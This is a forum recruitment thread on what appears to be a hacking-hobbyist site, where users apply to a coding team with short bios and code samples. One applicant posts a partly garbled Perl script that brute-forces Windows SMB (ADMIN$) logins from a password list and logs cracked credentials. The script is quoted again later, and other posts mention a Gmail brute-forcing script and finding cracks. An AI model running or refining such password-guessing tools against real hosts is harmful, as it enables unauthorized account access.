SysRq Programming Team Recruiting
After the first project some members haven't been as active as previously hoped.
However We currently have a group of skilled coders and designers that can provide substantial code.
If you plan to apply to join SysRq please reply to this post with the follow information:-
Username:- Skills:- Languages:- Example of strongest language (10 lines of code):- Estimation of time online per week:- Contactable via:- (email, msn, aim, etc) Why would SysRq benefit having you:-
We look forward to hearing from you
sigh, wish I could enter. The problem is I am not strong in programming/coding :/ - and since that's what you need I am useless.
Wish you luck on finding new members for your team.
Well, anyway, I'll fill in your list:
Username: Spyware Skills: Software-finder (I can find any program/keycode/crack)/teamworker/English (considering I am Dutch, I think my English is quite good)/Learning/Gathering Information
(as you see it are more basic skills, and no real "hacker" skills like php-coding or software development)
Languages: HTML, CSS, basic Visual Basic, basic javascript, basic batch-code Example of strongest language: Erh. I can't really code in real languages like perl or c++. I want to learn though. Estimation of time online per week: 5 hours a day Contactable via: (mail), (msn) Why would SysRq benefit having you:
I love teamwork, and helping other people. But maybe I would benefit from SysRq because I want to learn more.
I am also the mentor of Dontspionme, just a little side note. I'm always ready to help others if I can.
I would like to gain more experience and expand my coding-skills (PHP/C++ are top on my to-do list)
Username: Hust921 Skills: Noob Languages: A little php, some C++ and html … Estimation of time online per week:Every day!! Contactable via: Aim:Hylster Why join?: I'm think it's a good possibilitie learn. My english sucks! But i will do my best.
Understand if you need some skilled, and can't use me… :ninja:
Username:g077ch4 Skills: Being cooperative, working with a team, coming up with ideas Languages:Javascript, little java, PHP, HTML, CSS, Little Perl. Example of strongest language: Perl Estimation of time online per week: 50 Contactable via:, Why would SysRq benefit having you:Because I can help come up with ideas, since I have a lot of time on the computer, I can work a lot on projects, and be very active! I would be a great asset because I love to work with other people to make great things, because I can share my knowledge with others, and receive from others… That is why I want to join SysRq
This is a little SSH Brute Forcer me and a friend of mines coded at my house:
#g077ch4@gmail <~~ email me<~~
use getopt:Std;
getopts("t:l:s:u:f:", \%args);
print "** coded by g077ch4 []\n";
#parse options.. this may be ugly but it gets the job done :P
if ($args{t} && $args{t} ;
#open the password list and store them in an array
open (PWLIST, "<$args{1} ") OR DIE "!!! fatal:couldnt open $args{1}\n";
@passwords = <PWLIST>;
close (PWLIST);
# get rid of new line chars and count tha array elements
$num = @passwords;
if ($args{s} ) {
$share = args {s};
} else {
$share = "ADMIN\ $";
if ($args {u} ) {
$username = $args{u};
} sle {
$username = "Administrator";
$log = 0;
if (args {f} ) {
open (LOGFILE, ">>$args{f}") or die again;):P lol "--couldnt open $args{f}, not logging\n";
$log = 1l}
} else {
print "++ starting pent [target: $target, $num passwords] (pid=$$)\n";
$start_time = time();
$cur = $num;
$status = "0.00";
print "++ percent complete: $status\%";
foreach $password (@passwords) {
$smb_cmd = qq{smbclient //$target/$share $password -U $username -c dir 1>/dev/null 2>/dev/null};
$test = system($smb_cmd);
if($test == 0) {
$end_time = time();
# blank password
if(!($password)) {
$password = "blank, not set";
print "\n>> success: password for $username on $target is $password\n";
if($log == 1) {
print LOGFILE "## cracked host ##\nhost: $target, username: $username, password: $password\n";
print ">> brute force took ";
&calculate_time($end_time - $start_time);
for($i = 0; $i <= length($status); $i++) {
print "\b";
$status = sprintf("%.2f", (($num - $cur) / $num) * 100);
print "$status\%";
print "\n>> failed: couldn't crack password for $username on $target\n";
Username: Raster Skills: Dedicated/Fast programmer Languages: PHP/SQL, C++ Example of strongest language (10 lines of code): <– archive of sources <– gmail brute forcing script (exploits the RSS feed of email accounts) <– new website <– old website And I re-did the java14 challenge for MrCheese and itll soon be up and running. Contactable via: (MSN, email), (email), VBRaster (AIM) Why would SysRq benefit having you: By getting scripts done faster than ever!
O ya… g077ch4, that script looks like a windows shared file brute force login (also known as smb )… not SSH…
Username:- -Kurt- Skills:- Cooperative, and pretty fast Languages:- PHP, JavaScript, ActionScript, SQL, HTML, and CSS Example of strongest language (10 lines of code):- Well, I don't know what I can do in 10 lines, but a few things I have made in PHP are:
A very simply web based chatting system. If you ever heard of Outwar, you would understand what this is. An upload system which allows people to upload media, and vote and review other media. An automated scoreboard system so people can set up scoreboards for their flash games. I also made a forum, but it got deleted :(
Estimation of time online per week:- 13 hours a day, but I start school in a week, so it will be more like 3 hours a day :( Contactable via:- Email:, AIM: BurgerDog50 Why would SysRq benefit having you:- Im pretty experienced in PHP, and I want to help.
Username : thk-geo Skills: U decide :P Languages:Little PHP, Javascript, VBscript, HTML, and my beloved VB.Net I have been programming VB.Net together with thk-h3x since it got out and we have done lots of gr8 programs. Heres an example of a webcam code that we made before : Contactable via Email:, MSN: Why would SysRq benefit having you:Im kinda good in, and i got loads of time :P. Estimation of time online per week: Too much… Peace
Username: Chislam Skills: Solve problems fast, find other ways to do the same thing, can make very efficient code(ex. very few lines vs 500 line script lol) Languages: ugh lol - HTML, Javascript, PHP, SQL, Java, C, C++, Batch, VB as well as XML edited lol forgot about CSS Example of strongest language (10 lines of code): here are some links to some i have submitted to HBH: How to find perfect squares in C++ A simple chat box A bruteforce engine(puts all possible variations of numbers and letters and stores them into a txt file I have coded more stuff too, if you would like to see, just let me know :D Estimation of time online per week: 3 Hours on weekdays and 5 on weekends Contactable via: email - msn - aim - ArrestedForSk8n Why would SysRq benefit having you: I have at least a basic knowledge of several different languages, and am fluent in PHP, HTML, and getting there with C++ and Java.
g077ch4 wrote: This is a little SSH Brute Forcer me and a friend of mines coded at my house:
#g077ch4@gmail <~~ email me<~~
use getopt:Std;
getopts("t:l:s:u:f:", \%args);
print "** coded by g077ch4 []\n";
#parse options.. this may be ugly but it gets the job done :P
if ($args{t} && $args{t} ;
#open the password list and store them in an array
open (PWLIST, "<$args{1} ") OR DIE "!!! fatal:couldnt open $args{1}\n";
@passwords = <PWLIST>;
close (PWLIST);
# get rid of new line chars and count tha array elements
$num = @passwords;
if ($args{s} ) {
$share = args {s};
} else {
$share = "ADMIN\ $";
if ($args {u} ) {
$username = $args{u};
} sle {
$username = "Administrator";
$log = 0;
if (args {f} ) {
open (LOGFILE, ">>$args{f}") or die again;):P lol "--couldnt open $args{f}, not logging\n";
$log = 1l}
} else {
print "++ starting pent [target: $target, $num passwords] (pid=$$)\n";
$start_time = time();
$cur = $num;
$status = "0.00";
print "++ percent complete: $status\%";
foreach $password (@passwords) {
$smb_cmd = qq{smbclient //$target/$share $password -U $username -c dir 1>/dev/null 2>/dev/null};
$test = system($smb_cmd);
if($test == 0) {
$end_time = time();
# blank password
if(!($password)) {
$password = "blank, not set";
print "\n>> success: password for $username on $target is $password\n";
if($log == 1) {
print LOGFILE "## cracked host ##\nhost: $target, username: $username, password: $password\n";
print ">> brute force took ";
&calculate_time($end_time - $start_time);
for($i = 0; $i <= length($status); $i++) {
print "\b";
$status = sprintf("%.2f", (($num - $cur) / $num) * 100);
print "$status\%";
print "\n>> failed: couldn't crack password for $username on $target\n";
Thank you, System Meltdown… (does SysRQ still want him?) I think he should get a WARNING from one of the admins for plagiarism and lying: to set some ground rules and ethics for the rest of the community; he should serve as an example.. lol (i feel like a real dick right now, but its the truth, and justice must be served)
Username: Pyrodude0303 Skills: Being the coolest person ever and problem solving, ect… Languages: Java, html, javascript Example of strongest language (10 lines of code):
Its not really hacking, but it was a fun game to make (if you like Dungeons and Dragons) and btw i always win..because im cool
import java.util.; import javax.swing.; // Made by Matt, the greatest being alive public class FightGame { //creates a 20 sided die Die attackDie = new Die(20);
public static void main(String[] args)
//fighters with stats
Fighter[] fighters = {new Fighter("Pyrodude0303", 2,10,15,700),
new Fighter("Jack", 1,8,15,70),
new Fighter("Sarah", 1,8,15,70),
new Fighter("Justin", 1,8,15,70)
int numAlive = fighters.length;
while(numAlive > 1)
for(int i=0;i<fighters.length;i++)
int fighter1 = Integer.parseInt(JOptionPane.showInputDialog(null, "Which fighter do you want to be?"));
int fighter2 = Integer.parseInt(JOptionPane.showInputDialog(null, "Who do you want to fight?"));
Fighter opponent1, opponent2;
opponent1 = fighters[fighter1-1];
opponent2 = fighters[fighter2-1];
battle(opponent1, opponent2);
} public static void battle(Fighter f1, Fighter f2) {
while(f1.isAlive() && f2.isAlive())
// starts Fighter class public static class Fighter {
private String name;
private int numAttack, maxAttackDamage, currentLifePoints, defensePoints, maxLifePoints; //instance data
private Die damageDie;
// Fighter constructor
public Fighter(String player,int attackNumber,int Damage,int Defense,int MaxHP)
name = player;
numAttack = attackNumber;
damageDie = new Die(Damage); // creates the damage die
maxAttackDamage = Damage;
defensePoints = Defense;
maxLifePoints = currentLifePoints = MaxHP;
// attacks the other player
public void attacks(Fighter f2)
int i, attackRoll, damageRoll;
Die attackDie = new Die(20);
Die damageDie = new Die(maxAttackDamage);
for(i=0;i<numAttack && f2.isAlive();i++)
{attackRoll = attackDie.rollDie();
if(attackRoll >= f2.getDefensePoints())
damageRoll = damageDie.rollDie();
System.out.println(name +" hit " +" for " +damageRoll);
if(! f2.isAlive())
System.out.println( +" has died ");
System.out.println(name +" missed ";
public boolean isAlive()
return currentLifePoints > 0;
public void rest()
currentLifePoints = maxLifePoints;
public void isHit(int Damage)
currentLifePoints = currentLifePoints - Damage;
public int getDefensePoints()
return defensePoints;
public String toString()
return name + " " + currentLifePoints;
} // end Fighter class
public static class Die { private int numSides, value; private Random g;
public Die()
numSides = 6;
value = 0;
g = new Random();
public Die(int size)
numSides = size;
value = 0;
g = new Random();
public int rollDie()
value = Math.abs(g.nextInt())%numSides + 1;
return value;
public int getRoll()
return value;
} // end Die class
} // end Fighter class Estimation of time online per week: about 10+ Contactable via:- (email, msn, aim, etc) AIM - Pyrodude0303 Why would SysRq benefit having you: WHo wouldnt? also like to add that i could help the few java members as well, and they can help me program
Username: alfredwolf Skills: cooperative,some programming Languages: Html, PHP, javascript, C++ basic Example of strongest language (10 lines of code): i haven't really coded anything to good… Estimation of time online per week:9+ Contactable via:- (email, msn, aim, etc)AIM - alfredhbh Why would SysRq benefit having you: i will do anything to help the team and learn whatever possible for the team
Username: TrueHacker Skillz: Got Em'… Yeah well I can basically do anything to do with programming.
Languages: I'm fluent in HTML, PHP, AJAX, C, C++. I'm an expert in VBA, VB,, and Fortran. Example of strongest language (10 lines of code):-
This is a part of a quick program that I wrote in for a challenge to take an object from a webpage, double it, and return it and submit it.
Private Sub WebBrowser1_DocumentCompleted(ByVal sender As Object, ByVal e As System.Windows.Forms.WebBrowserDocumentCompletedEventArgs) Handles WebBrowser1.DocumentCompleted
Dim page As String
Dim idx As Integer
Dim num As Long
page = WebBrowser1.DocumentText
idx = InStr(page, "<hr>")
num = Mid(page, idx + 4, 9) * 2
End Sub
Estimation of time online per week: During the week 6-7 hours Weekends - 12 hours
Contactable via:- either Likemike356 - aim
Why would SysRq benefit having you:- Not to be self-confident or anything (lol), but yeah I'm one of those people who can solve anything with programming. I have been programming for quite a while, know lots of languages, and a good problem solver.
Username: V1P3R Skills: 1337, (lol jk :p ) erm… warez lol, finding app, games, movies lol thats all i can think of lol :D Languages: HTML, PHP, bit of C++ Example of strongest language (10 lines of code):ermm…can i pass this one? :p Estimation of time online per week:A lot :) (now that im finished my job for the summer) :D Contactable via:- (email, msn, aim, etc)you know flash :) Why would SysRq benefit having you: i am online a lot and i like to learn.
As an ex-member of SysRQ, i recommend Pyrodude0303 for the JAVA post. I was filling in that position, but college is starting, and the work is overwhelming… I suggest that the -the_Flash-, and other sysRQ leaders highly consider my recommendation of Pyrodude.
I know pyrodude, and I'm sure he can help greatly if time allows him, and if the project asks something reasonable of him to do.
As of now we are finished recruiting. You will be updated if we are recuirting again anytime soon.
TrueHacker - I got your PM and think you should continue with your team - If you have the skills you say you do, the team will need you.
Team update:- The_Flash Stax SlimTim10 Tancurrom Sp00ky Cubeman372 Mozzer Raster willeH Pyrodude
thank you for all your applications.